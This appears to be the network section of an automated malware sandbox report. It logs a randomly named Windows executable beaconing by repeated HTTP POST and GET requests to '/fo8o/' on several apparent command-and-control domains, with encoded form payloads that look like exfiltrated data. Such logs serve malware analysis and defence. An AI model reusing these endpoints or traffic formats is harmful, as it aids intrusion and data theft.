                                                    Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 4f 76 2f 78 70 73 6d 4c 4d 41 46 48 55 74 45 6a 32 6f 50 6a 43 64 33 45 42 51 62 2f 41 4c 52 41 3d 3d
                                                    Data Ascii: Zl4h1=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2Ov/xpsmLMAFHUtEj2oPjCd3EBQb/ALRA==
Jun 9, 2024 18:00:07.068464994 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:00:06 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49713 | 202.172.28.202 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
Timestamp | Bytes transferred | Direction | Data
Jun 9, 2024 18:00:08.733159065 CEST | 799 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.kasegitai.tokyo
                                                    Origin: http://www.kasegitai.tokyo
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.kasegitai.tokyo/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 4b 66 6a 69 67 67 53 4f 6c 43 4b 4d 5a 66 4e 68 56 33 6f 39 49 68 6e 54 65 53 52 76 49 54 58 39 30 3d
                                                    Data Ascii: Zl4h1=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwKfjiggSOlCKMZfNhV3o9IhnTeSRvITX90=
Jun 9, 2024 18:00:09.618321896 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:00:09 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49714 | 202.172.28.202 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
Timestamp | Bytes transferred | Direction | Data
Jun 9, 2024 18:00:11.269473076 CEST | 1812 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.kasegitai.tokyo
                                                    Origin: http://www.kasegitai.tokyo
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.kasegitai.tokyo/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 49 2f 41 58 64 75 46 44 7a 61 66 57 4f 43 37 6b 6b 53 4e 50 56 7a 48 2b 49 67 4b 6a 68 7a 72 62 63 53 6f 78 33 6e 57 64 73 70 41 37 64 62 4e 47 4e 35 33 62 36 78 63 2f 71 49 46 6a 49 4d 77 72 79 48 7a 4c 57 51 75 78 6f 61 55 55 4a 6f 6d 4f 45 51 35 34 79 4b 39 63 42 55 6e 31 47 63 4e 34 31 46 70 2f 44 4d 73 43 38 44 4e 6c 7a 54 74 71 6c 33 59 58 64 63 4f 77 63 62 73 52 61 73 61 62 4b 43 68 56 70 64 4e 75 45 7a 66 59 53 7a 74 41 47 48 49 6d 65 76 6a 77 69 71 35 39 51 79 4e 64 36 32 [TRUNCATED]
                                                    Data Ascii: Zl4h1=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 [TRUNCATED]
Jun 9, 2024 18:00:12.141779900 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:00:12 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 49715 | 202.172.28.202 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
Timestamp | Bytes transferred | Direction | Data
Jun 9, 2024 18:00:13.800039053 CEST | 507 | OUT | GET /fo8o/?Zl4h1=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOn9Eslw/yPbbhzQEQvbg5EH2R2vQNh194=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.kasegitai.tokyo
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 9, 2024 18:00:14.673310995 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:00:14 GMT
                                                    Server: Apache
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.11 | 49717 | 116.50.37.244 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
Timestamp | Bytes transferred | Direction | Data
Jun 9, 2024 18:00:21.000495911 CEST | 797 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.goldenjade-travel.com
                                                    Origin: http://www.goldenjade-travel.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 7a 4e 6b 71 64 71 73 48 6e 59 57 6a 72 30 4f 47 34 69 4f 6a 54 77 41 52 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                    Data Ascii: Zl4h1=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPzNkqdqsHnYWjr0OG4iOjTwARZZMNmPWg==
                                                    Timestamp: Jun 9, 2024 18:00:22.126542091 CEST | Bytes transferred: 599 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.goldenjade-travel.com/fo8o/
                                                    Server: Microsoft-IIS/10.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                    Access-Control-Allow-Credentials: true
                                                    Date: Sun, 09 Jun 2024 16:00:21 GMT
                                                    Connection: close
                                                    Content-Length: 156
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                    Session ID: 6 | Source IP: 192.168.2.11 | Source Port: 49718 | Destination IP: 116.50.37.244 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:00:23.549029112 CEST | Bytes transferred: 817 | Direction: OUT | Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.goldenjade-travel.com
                                                    Origin: http://www.goldenjade-travel.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwbyU34pF8DGNkwr2CMK8E1A4746gpEjrVU=
                                                    Timestamp: Jun 9, 2024 18:00:24.699737072 CEST | Bytes transferred: 599 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.goldenjade-travel.com/fo8o/
                                                    Server: Microsoft-IIS/10.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                    Access-Control-Allow-Credentials: true
                                                    Date: Sun, 09 Jun 2024 16:00:23 GMT
                                                    Connection: close
                                                    Content-Length: 156
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                    Session ID: 7 | Source IP: 192.168.2.11 | Source Port: 49719 | Destination IP: 116.50.37.244 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:00:26.081218958 CEST | Bytes transferred: 1830 | Direction: OUT | Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.goldenjade-travel.com
                                                    Origin: http://www.goldenjade-travel.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZRxnnHG8zM/uLW25e83YvuzFA8poy6ap51g7Gk4SYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZdIxkdfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB4QpMYBMWcky02DneIJBpTzAmuJOAz5QXmbpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUhYLUIy6fLP8iYfrnTUW0LSocQQjipnC0WvC+qSq9UVMiDhBD752zisyPxjgCYVpU4vit/jihlIuAKAdDu7mWpC+gbIbINmRdtk41h4oclAMbxlNnnaHftmGNuCNwDdKC5sB1gl2vU4K6s91Z8fv4utAGt4pOjM7F0Viocf+bG41Kahiohy1mG7c6AYoxeUFLYtJBxw1PdR9c9j/q3g03YHK6YpS8sj4vBMQupa+fUtHvDt8EQkQragXZpgRHFfxG2yPCP6Oz4xU72X3yyxSk4TaxsupqvMvtMk56SZLA4KS5viPeI3ukdW72sREt1ukWYVAqi3JoMHg/qqzQv6n7+TA8VFCRAgXPFmCkH4c/NhxQBsQCETt4Qh/BDGYgY5Ab1lkuAD+KPGr1SaeEgmgi6CcZMLIBwoGzIWkViCqshdND+Ct6YcjY2kPO9mihC5sUoMK2IP/f8J4vz0E35RhbK4Wxqb0Z+q+uGXHNJTkN9UrNxITrcSTq4cOhpA5QpFR/tuTPZIylTxVD [TRUNCATED]
                                                    Timestamp: Jun 9, 2024 18:00:27.208110094 CEST | Bytes transferred: 599 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.goldenjade-travel.com/fo8o/
                                                    Server: Microsoft-IIS/10.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                    Access-Control-Allow-Credentials: true
                                                    Date: Sun, 09 Jun 2024 16:00:26 GMT
                                                    Connection: close
                                                    Content-Length: 156
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                    Session ID: 8 | Source IP: 192.168.2.11 | Source Port: 49720 | Destination IP: 116.50.37.244 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:00:28.611443996 CEST | Bytes transferred: 513 | Direction: OUT | Data: GET /fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.goldenjade-travel.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Timestamp: Jun 9, 2024 18:00:29.777225018 CEST | Bytes transferred: 885 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&Pbw=PLVXbnG85
                                                    Server: Microsoft-IIS/10.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                    Access-Control-Allow-Credentials: true
                                                    Date: Sun, 09 Jun 2024 16:00:29 GMT
                                                    Connection: close
                                                    Content-Length: 301
                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&amp;Pbw=PLVXbnG85">here</a>.</h2></body></html>


                                                    Session ID: 9 | Source IP: 192.168.2.11 | Source Port: 49721 | Destination IP: 46.30.213.191 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:00:35.109940052 CEST | Bytes transferred: 794 | Direction: OUT | Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.antonio-vivaldi.mobi
                                                    Origin: http://www.antonio-vivaldi.mobi
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OmgJukSSscLEwDKLPK7JTMW/yaW+Pmvf8sA==
                                                    Timestamp: Jun 9, 2024 18:00:35.940392017 CEST | Bytes transferred: 561 | Direction: IN | Data: HTTP/1.1 302 Found
                                                    Cache-Control: max-age:600, public
                                                    Content-Length: 163
                                                    Expires: Sun, 09 Jun 2024 16:10:35 GMT
                                                    Last-Modified: Sun, 09 Jun 2024 16:00:35 GMT
                                                    Location: https://musee.mobi/vivaldi/fo8o/
                                                    Date: Sun, 09 Jun 2024 16:00:35 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    X-Onecom-Cluster-Name:
                                                    X-Varnish: 13834904433
                                                    Age: 0
                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                    Session ID: 10 | Source IP: 192.168.2.11 | Source Port: 49722 | Destination IP: 46.30.213.191 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:00:37.642338037 CEST | Bytes transferred: 814 | Direction: OUT | Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.antonio-vivaldi.mobi
                                                    Origin: http://www.antonio-vivaldi.mobi
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPF3wOwf/ve613PbTcdkxO3N0/dviHNUD9Yc=
